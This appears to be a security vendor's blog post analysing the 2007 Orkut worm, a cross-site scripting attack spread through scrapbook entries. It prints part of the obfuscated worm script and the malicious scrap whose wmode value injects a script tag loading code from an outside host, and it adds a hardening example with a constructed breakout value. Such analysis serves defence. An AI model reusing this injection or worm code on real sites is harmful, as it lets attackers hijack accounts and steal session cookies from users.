The Orkut Worm Has Landed!
Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users' systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js", which was injected using an embed tag. Here is a snippet of the JavaScript file:
function $(p,a,c,k,e,d) {
e=function(c) {
return(c>35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];
7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?";
m="+m.2f():"")+(c?";
c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);
6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?";
9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);
3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));
f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&
15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
…
We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by the Orkut Virus.”
This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends each friend a malicious scrap. The worm uses Orkut scrap entries as its propagation vector. Below is an example of the code that defines the Orkut scrap:
2008 vem ai… que ele comece mto bem par avc
<br/>
[silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver]
<br/>
<embed src=http://www.orkut.com/LoL.aspx type=
"application/x-shockwave-flash" wmode="transparent');
Script=document.createElement('script');
Script.src='http://files.myopera111.com/[REMOVED].js';
Document.getElementByTagname('head')[0].appendChild
(script);escape('" width="1" height="1">
</embed>
When you look at the code there are a few attributes for the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a Flash object to display the Flash content. Now when you look closely at the code, notice the wmode attribute:
wmode="transparent');
The author has closed wmode with '); and has added some script code in the attribute value itself. Let's analyze this further. We tested the script with a variant of the malicious scrap:
<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:
<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx',
'337533968', '1', '1', '9', '#FFFFFF',
'autohigh', '', '', '337533968');
flashWriter._addParam('wmode', 'transparent');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv337533968');</script>
The Orkut application parsed the scrap text and created the flash object with values specified in the scrap.
If we look at the source code of the page rendered for the malicious scrap, it looks like the sample below (the injected code, originally marked in bold and red, is the script and escape lines that sit between the two _addParam calls). Note that the escape function is appended so that the injected code fits syntactically into the generated statement:
flashWriter._addParam('wmode', 'transparent');
script = document.createElement('script');
script.src='http://files.myopera.com/virusd[REMOVED]';
document.getElementsByTagName('head')[0].appendChild(script);
escape('');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
Based on what we have seen so far, we can infer that Orkut's input filters failed to sanitize this attribute value in the request. The whole wmode value was taken as-is and inserted into the rendering code:
flashWriter._addParam('wmode', 'transparent'); (malicious script)
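To make the injection point and its fix concrete, here is an added example in JavaScript; it is not Orkut's code, and the function names and the stub flashWriter are hypothetical. It shows a renderer that concatenates the wmode value straight into the inline script (the failure described above), the same renderer with the value encoded for a JavaScript string context, and a hardened version that additionally restricts wmode to its three legal values. The hostile value is a constructed one with the same structure as the worm's (close the string and the call, add a statement, re-open a string); a stub flashWriter lets each rendered line actually run so the difference is observable.

```javascript
// Added example (not Orkut's code): why interpolating a scrap attribute into an
// inline <script> string literal lets the value break out, and two ways to
// render it safely. renderVulnerable, renderEncoded, renderHardened and the
// flashWriter stub are hypothetical; the rendered line mirrors the _addParam
// call shown in the post.

// Constructed scrap attributes in the shape the post describes.
const benignScrap = {
  src: 'http://www.orkut.com/LoL.aspx',
  wmode: 'transparent',
  width: '1',
  height: '1',
};

// Constructed hostile value with the same structure as the worm's wmode: it
// closes the JavaScript string and the _addParam(...) call, adds a statement,
// then re-opens a string so the rest of the template still parses.
const hostileScrap = {
  src: 'http://www.orkut.com/LoL.aspx',
  wmode: "transparent');sideEffects.push('injected');escape('",
  width: '1',
  height: '1',
};

// 1. Vulnerable renderer: raw string concatenation into a JS string literal.
function renderVulnerable(scrap) {
  return "flashWriter._addParam('wmode', '" + scrap.wmode + "');";
}

// 2. Context-aware encoding: JSON.stringify yields a valid JS string literal;
//    '<' and '>' are escaped as well so the output can never close the
//    surrounding <script> element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e');
}

function renderEncoded(scrap) {
  return "flashWriter._addParam('wmode', " + jsStringLiteral(scrap.wmode) + ");";
}

// 3. Defense in depth: wmode has only three legal values, so allowlist it and
//    still encode the result.
const WMODE_ALLOWED = new Set(['window', 'opaque', 'transparent']);

function renderHardened(scrap) {
  const wmode = WMODE_ALLOWED.has(scrap.wmode) ? scrap.wmode : 'window';
  return "flashWriter._addParam('wmode', " + jsStringLiteral(wmode) + ");";
}

// Content check for the filter layer: flags values containing characters that
// can end a JS string literal or an HTML tag, which a legitimate wmode never needs.
function hasStringBreakout(value) {
  return /['"\\\r\n<>]/.test(String(value));
}

// Runs a rendered line the way the browser runs the inline script, with a stub
// flashWriter, and reports the params recorded plus any injected side effects.
function executeRendered(line) {
  const params = {};
  const sideEffects = [];
  const flashWriter = { _addParam: (key, value) => { params[key] = value; } };
  new Function('flashWriter', 'sideEffects', line)(flashWriter, sideEffects);
  return { params, sideEffects };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, render] of [
    ['vulnerable', renderVulnerable],
    ['encoded', renderEncoded],
    ['hardened', renderHardened],
  ]) {
    console.log(name, JSON.stringify(executeRendered(render(hostileScrap))));
  }
}
```

Running the block shows the vulnerable line recording wmode and then executing the injected statement, the encoded line storing the entire hostile string harmlessly as the wmode value, and the hardened line falling back to window. Encoding for the output context is the actual fix; the allowlist is cheap extra protection because the value set is tiny, and hasStringBreakout is the kind of check a content filter can apply before the scrap is ever stored.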
In this way the worm inserts a malicious script through the embed tag and uses it for exploitation. Interestingly, a victim doesn't need to click on the scrap: when the scrapbook is loaded, the malicious embed code loads the virus.js file silently. The JavaScript takes the cookies and tokens of the logged-in user and uses them to spread the worm further.
This worm illustrates how a simple script injection exploit can affect a large social networking site. Remember, users didn't have to click anything: the malicious script ran silently as soon as the page loaded. The worm could have been used for other malicious purposes as well, such as stealing cookies, exploiting other vulnerabilities, or stealing sensitive data.
As of today, the virus.js script is no longer available on the site, and it appears that Orkut has implemented adequate checks to validate content when a scrap is posted. The malicious scraps have also been deleted from the scrapbooks of the infected users.
Symantec has built a number of excellent Web browsing protections into our 2008 product range.
The worm is detected by Symantec's antivirus products as JS.Woorkut with certified definitions of 12/19/2007 rev. 7 and greater. We recommend that you keep your Symantec products up to date, patch your systems, and run your browser with limited options enabled.